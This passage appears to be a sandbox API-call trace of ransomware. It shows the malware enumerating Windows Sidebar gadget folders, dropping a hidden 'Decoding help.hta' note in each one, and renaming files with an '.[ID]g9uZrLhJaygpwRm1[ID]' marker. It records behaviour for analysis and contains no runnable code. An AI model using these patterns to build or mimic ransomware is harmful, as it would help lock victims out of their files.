ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2eb0 [0045.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.267] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.267] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.267] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ccadbf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9ccadbf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44a767c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.267] lstrcpyW (in: lpString1=0x10e1dc88, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0045.267] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0045.267] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0045.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0xffffffff [0045.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.555] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ba5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ba5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.556] CloseHandle (hObject=0x1e8) returned 1 [0045.556] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.821] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.821] lstrlenW (lpString="drag.png") returned 8 [0048.821] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0048.821] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0048.821] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" [0048.821] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" [0048.821] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.598] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.598] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.598] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.598] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0050.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0050.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" [0050.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0050.601] GlobalMemoryStatus (in: lpBuffer=0x1ba5fd10 | out: lpBuffer=0x1ba5fd10) [0050.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252a7ea8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a8 [0050.744] CloseHandle (hObject=0x4a8) returned 1 [0050.744] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.744] lstrcpyW (in: lpString1=0x25348128, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0050.744] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0050.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0050.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0x1 [0050.744] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.744] lstrlenW (lpString="icon.png") returned 8 [0050.744] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0050.744] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0050.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" [0050.744] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" [0050.745] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.287] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0052.288] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0052.288] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0052.288] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0052.288] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0052.288] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0052.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" [0052.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0052.288] GlobalMemoryStatus (in: lpBuffer=0x1ba5fd10 | out: lpBuffer=0x1ba5fd10) [0052.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f00e18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x730 [0052.409] CloseHandle (hObject=0x730) returned 1 [0052.410] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9cf0f1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9cf0f1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb640b89c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0052.418] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0052.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0052.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0052.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0x1 [0052.437] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0052.437] lstrlenW (lpString="logo.png") returned 8 [0052.437] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0052.437] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 67 [0052.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" [0052.437] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" [0052.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.438] FindNextFileW (in: hFindFile=0x5e2eb0, lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9cf0f1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9cf0f1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb640b89c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0052.438] FindClose (in: hFindFile=0x5e2eb0 | out: hFindFile=0x5e2eb0) returned 1 Thread: id = 426 os_tid = 0xba0 [0043.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*", lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0045.214] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.214] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.214] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.214] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba48750b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba48750b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb79c415c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.214] lstrcpyW (in: lpString1=0x10d06a10, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0045.214] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0045.214] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0045.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0xffffffff [0045.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.540] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bb9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bb9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.541] CloseHandle (hObject=0x1e8) returned 1 [0045.541] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.815] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.815] lstrlenW (lpString="drag.png") returned 8 [0048.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0048.815] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0048.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" [0048.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" [0048.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.588] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.588] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.588] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.588] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.590] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows 